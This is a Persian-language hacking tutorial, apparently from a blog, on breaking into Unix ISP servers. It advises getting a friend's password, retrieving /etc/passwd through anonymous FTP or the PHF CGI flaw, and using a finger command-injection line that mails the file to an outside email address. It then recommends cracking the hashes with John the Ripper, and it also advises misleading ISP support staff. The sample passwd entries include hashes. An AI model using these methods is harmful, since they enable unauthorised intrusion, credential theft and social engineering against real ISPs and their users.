Unixیكی از سرورهایی است كه در جهان بسیار از آن استفاده می شود
در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند كه سرور آن ها Unixباشند
.بنابر این شما می توانید برای هك آن ها از این راه ها استفاده كنید شما در این راه احتمالا با مشكلات زیادی برخورد خواهید كرد .من راه كامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری كرد و این اشاره ای است كه شما را به طرف راه درست هدایت می كند .
برای هك یونیكس از این طریق عمل می كنند كه با روش هایی كه ذكر خواهد شد فایل حاوی Passwordها و IDها را كه به نام Passwdمی باشد دریافت كنند .
این فایل یك فایل متنی است كه در آن اطلاعات بصورت رمز در آمده .وقتی شما یك فایل Passwdرا باز كنید چنین نوشته هایی را می بینید .كه باید آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad
در اینجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده می باشد .
ادامه متن در ادامه مطلب>>
Unixیكی از سرورهایی است كه در جهان بسیار از آن استفاده می شود در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند كه سرور آن ها Unixباشند .بنابر این شما می توانید برای هك آن ها از این راه ها استفاده كنید شما در این راه احتمالا با مشكلات زیادی برخورد خواهید كرد .من راه كامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری كرد و این اشاره ای است كه شما را به طرف راه درست هدایت می كند .برای هك یونیكس از این طریق عمل می كنند كه با روش هایی كه ذكر خواهد شد فایل حاوی Passwordها و IDها را كه به نام Passwdمی باشد دریافت كنند .این فایل یك فایل متنی است كه در آن اطلاعات بصورت رمز در آمده .وقتی شما یك فایل Passwdرا باز كنید چنین نوشته هایی را
می بینید .كه باید آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:3A62i9qr:1012:10:Mashhad
در اینجا مثلا Tahaنام IDو 3a62...كلمه عبور اما به صورت رمز در آمده می باشد .
شاید فایل به شكل زیر هم باشد .اما این فایل كار را غیرممكن می سازد.در صورتی كه به شكل زیر باشد یعنی در آن علامت *به جای كلمه ی به رمز آمده به آن ها Shadowedگفته می شود .
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh
ما فعلا می خواهیم این فایل را دریافت كنیم .اولین قدم این است كه آیدی در آن ISPبرای خود دست و پا كنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یك آشنای دور .پیدا كردن رمز دوست شما به سادگی میسر است كه در حوصله این مقاله نمی گنجد .بعد از پیدا كردن رمز شما با آیدی دوستتان به شبكه Connectشوید .این اتصال می تواند یك اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال كامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد كنید
FTP http://www.domain.com/
كه Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد كنید كلمه ی Anonymousرا بزنید .سپس وقتی درخواست كلمه عبور شد كلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login failedدریافت می شود .دوباره امتحان كنید و این بار در كادر Passwordآدرس Emailای را وارد كنید .اگر این بار هم جواب نداد به جای كلمه ی anonymousاز Userخود یعنی دوستتان استفاده كنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان كنید
FTP ftp.domain.com
اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال كنید كه چگونه می توانم از سرور FTPخود شما استفاده كنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده كنم ولی مواظب باشید كه نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بكنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد كه آن شاخه برای شما قفل شده باشد .برای كار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ كنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا كنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان كنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت كه در Internet Browserخود آدرس زیر را وارد كنید .
http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd
اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین كار را انجام دهید .این روش به شرطی جواب می دهد كه Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه كنید .
www.domain.com/cgi-bin/finger
اگر این آدرس كار نكند دیگر هیچ امیدی نیست اما اگر كار كند كادری جلوی شما ظاهر می شود كه می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد كنید .
ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd
كه در این آدرس IDشناسه كاربری یك شخص است كه مثلا می توانید از آیدی دوستتان استفاده كنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یك نمونه است .
bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd
با وارد كردن این دستور فایل Passwdبرای من به آدرس 3dhack@yahoo.com پست می شود !
خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید كه بهتر در غیر اینصورت باید بی خیال این روش شوید .
حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون كمكی به شما نمی كند و باید از روش های دیگری استفاده كرد .اما اگر یك فایل مثل نمونه اولی كه در بالا بود گیر آوردید می توانید كار خود را ادامه دهید حالا شما نیاز به یك برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاورید اما نمونه ی دیگری از این نمونه برنامه ها به كتابخانه هك به نام jill_v20 ارسال شد .با استفاده از این برنامه ها می توانید به هدف خود برسید . به همین راحتی .
آمار مطالب
آمار کاربران
کاربران آنلاین
آمار بازدید
آمار
وب سایت:
عضویت سریع
